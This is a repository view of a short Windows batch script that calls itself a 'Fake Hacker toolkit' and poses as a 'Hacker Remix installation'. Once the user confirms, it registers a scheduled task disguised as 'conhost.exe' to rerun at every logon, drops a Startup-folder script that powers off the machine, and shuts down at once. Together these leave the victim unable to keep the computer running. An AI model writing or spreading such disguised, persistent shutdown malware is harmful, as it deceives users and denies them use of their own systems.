summaryrefslogtreecommitdiff
path: root/ShitStain/Thurd/ShitStain_The_Thurd.bat
blob: ab8d1ab74ee186d9f1e74d018ea580f27a994bcd (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
::Fake Hacker toolkit that makes a shutdown.bat on startup menu
@echo off
title Hacker Remix
goto choice

:start
schtasks /create /tn "conhost.exe" /tr %CD%\%0 /sc onlogon
cd /d "%systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
echo @echo off > lol.bat
echo shutdown /p >>lol.bat
shutdown /p
break

:choice
color 0f
echo Do you want to begin the Hacker Remix installation?[Y/N]
set input=
set /p input=
if %input%==Y goto start
if %input%==y goto start
if %input%==yes goto start
if %input%==YES goto start
if %input%==Yes goto start
if %input%==N goto end
if %input%==n goto end
if %input%==no goto end
if %input%==NO goto end
if %input%==No goto end

:end
break